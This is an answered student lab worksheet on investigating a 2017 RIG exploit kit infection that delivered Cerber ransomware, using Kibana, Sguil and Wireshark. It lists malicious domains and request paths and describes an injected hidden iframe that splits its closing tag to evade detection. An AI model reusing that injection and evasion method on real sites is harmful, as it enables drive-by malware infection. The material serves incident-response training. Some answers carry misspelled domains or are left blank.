Investigating a Malware Exploit

In this lab you will:

Part 1: Use Kibana to Learn About a Malware Exploit
Part 2: Investigate the Exploit with Sguil
Part 3: Use Wireshark to Investigate an Attack
Part 4: Examine Exploit Artifacts

You have been given the following details about the event:

The event happened in January of 2017.

It was discovered by the Snort NIDS

Part 1: Use Kibana to Learn About a Malware

Exploit
narrow the time range in the main Kibana dashboard, then go to
the NIDS Alert Data dashboard

Click the first point on the timeline to filter for only that first event.

Investigating a Malware Exploit 1

 then see the NIDS Alerts to answer the following questions:

💡 What is the time of the first detected NIDS alert in Kibana?

Jan 27, 2017 – 22:54:43

💡 What is the source IP address in the alert?

172.16.4.193

Investigating a Malware Exploit 2

 💡 What is the destination IP address in the alert?
194.87.234.129

💡 What is the destination port in the alert? What service is this?

80, HTTP

💡 What is the classification of the alert?

Trojan Activity

💡 What is the destination geo country name?

Russia

💡 What is the malware family for this event?

Exploit_Kit_RIG

open sguil and Select the alert ID 5.26 “the same time of the first detected
NIDS alert “

💡 What is the severity of the exploit?

The signature severity is Major.

Investigating a Malware Exploit 3

 💡 What is an Exploit Kit? (EK) Search on the internet to answer this
question.
The RIG exploit kit is a set of malicious JavaScript scripts
embedded in compromised or malicious websites by the threat
actors, which are then promoted through malvertising.

💡 What website did the user intend to connect to?

Click the alert _id value, you can pivot to CapME to inspect the transcript of
the event.

💡 What website did the user intend to connect to?

www.homeimprovement.com

💡 What URL did the browser refer the user to?

ty.benme.com

Investigating a Malware Exploit 4

 💡 What kind of content is requested by the source host from
tybenme.com? Why could this be a problem? Look in the DST server
block of the transcript too. .The content is shown as
gzip. It is probably a malware file. Because it is compressed, the
contents of the file are obfuscated. It is not easy to see what is in
the file.

What are some of the websites that are listed?

click the HTTP entry located under Zeek Hunting - Scroll down to the
HTTP – Sites section of the dashboard.

💡 What are some of the websites that are listed?

Investigating a Malware Exploit 5

 💡 Which of these sites is likely part of the exploit campaign?

p27dokhpz2n7nvgr.1jw2lx.top
homeimprovement.com

tyu.benme.com
spotsbill.com

retrotip.visionurbana.com.ve

💡 What are the HTTP – MIME Types listed in the Tag Cloud?

Part 2: Investigate the Exploit with Sguil

Investigating a Malware Exploit 6

 Select the alert ID 5.2 (Event message ET CURRENT Evil Redirector Leading
to EK Jul 12 2016).

💡 According to the IDS signature rule which malware family triggered this
alert? You may need to scroll through the alert signature to find this
entry.

💡 According to the Event Messages in Sguil what exploit kit (EK) is

involved in this attack?
RIG EK Exploit

💡 Beyond labelling the attack as trojan activity, what other information is

provided regarding the type and name of the malware involved?
ransomware, Cerber

💡 By your best estimate looking at the alerts so far, what is the basic
vector of this attack? How did the attack take place?
by visiting a malicious web page.

For alert ID 5.2 :

💡 What are the referrer and host websites that are involved in the first
SRC event? What do you think the user did to generate this alert?

Investigating a Malware Exploit 7

 The user issued a search on Bing with the search terms
“home improvement remodeling your kitchen.” The user
clicked the www.homeimprovement.com link and visited that
site.

for alert ID 5.24 :

Investigating a Malware Exploit 8

 💡 What kind of request was involved?
HTTP/1.1 GET request

💡 Were any files requested?

dle_js.js

💡 What is the URL for the referer and the host website?
The referer website was www.homeimprovement.com/remodeling-
your-kitchen-cabinets.html , the host website was
retrotip.visionbura.com.ve.

💡 How the content encoded?

gzip

for alert ID 5.25 :

Investigating a Malware Exploit 9

 💡 How many requests and responses were involved in this alert?
3 requests and 3 responses

💡 What was the first request?

GET /?ct=Vivaldi&biw=Vivaldi.95ec

💡 Who was the referrer?

www.homeimprovement.com/remodeling-your-kitchen-
cabinets.html

💡 Who was the host server request to?

tyu.benme.com

Investigating a Malware Exploit 10

 💡 Was the response encoded?
Yes, gzip

💡 What was the second request?

POST /?oq=CEh3h8…. Vivaldi

💡 Who was the host server request to?

tyu.benme.com

💡 Was the response encoded?

Yes, gzip

💡 What was the third request?

GET /?biw=SeaMonkey.105….

💡 Who was the referrer?

http://tyu.benme.com/?biw…

💡 What was the Content-Type of the third response?

application/x-shockwave-flash

💡 What were the first 3 characters of the data in the response? The data
starts after the last DST: entry. CWS

💡 What type of file was downloaded? What application uses this type of
file?

Investigating a Malware Exploit 11

 💡 How many files are there and what is the file types?

Right-click the same ID again and choose Network Miner. Click the Files tab.

Part 3: Use Wireshark to Investigate an Attack

💡 What website directed the user to the www.homeimprovement.com

website? bing

for alert ID 5.2 , :

alert ID 5.24 :

Investigating a Malware Exploit 12

 💡 What is the http request for?
A JavaScript file that is named dle_js.js.

💡 What is the host server?

retrotip.visionurbana.com.ve

Create a Hash for an Exported Malware File.

. VirusTotal will return a list of the virus detection engines that have a rule that
matches this hash.

💡 What did VirusTotal tell you about this file? 34 of 59 antivirus

programs have rules that identify this hash as coming from a
malware file.

Investigating a Malware Exploit 13

 Part 4: Examine Exploit Artifacts
Open the dle_js.js file

💡 What does the file do?

The code you provided is a JavaScript code snippet that uses the
document.write method to dynamically generate and insert HTML content into

a web page. creating an iframe, that takes the user to a URI at

tyu.benme.com

💡 How does the code in the javascript file attempt to avoid detection?
By splitting the end iframe tag into two piecesThe </ifr’ +’ame>

In a text editor, open the text/html file that was saved to your home folder
with Vivaldi as part of the filename.

💡 What kind of file it is?

An HTML webpage

💡 What are some interesting things about the iframe? Does it call
anything?
It is hidden. It calls a start() function

Investigating a Malware Exploit 14

 💡 What does the start() function do?
It writes to the browser window. It creates an HTML form and submits
the variable NormalURL through POST. The NormalURL variable
equals a URI at tyu.benme.com.

💡 What do you think the purpose of the getBrowser() function is?

The getBrowser() function determines the type of browser that the
webpage is displayed in.

Investigating a Malware Exploit 15